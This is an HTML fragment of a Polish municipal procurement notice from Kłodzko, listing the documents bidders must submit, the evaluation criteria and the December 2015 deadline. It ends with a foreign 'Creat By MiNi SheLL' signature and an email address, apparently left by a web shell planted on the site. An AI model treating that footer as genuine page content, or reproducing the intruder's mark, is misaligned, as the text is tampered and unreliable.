<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełnione i podpisane formularze.
2) Zaakceptowany projekt umowy. Projekt umowy powinien zostać zaakceptowany bez dokonywania w nim jakichkolwiek zmian.
3)Oświadczenie o zastrzeżeniu informacji niejawnych, jeżeli wykonawca zastrzegł, ze nie mogą być udostępniane- wzór oświadczenia stanowi załącznik nr 10 do siwz.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin płatnosci - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.bip.klodzko.pl/zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Kłodzku ; pl. B. Chrobrego 1;   57-300 Kłodzko , pok. 231.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.12.2015 godzina 10:00, miejsce: Urząd Miasta w Kłodzku ; pl. B. Chrobrego 1;   57-300 Kłodzko , pok. 101, Biuro Obsługi Ludnosci.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com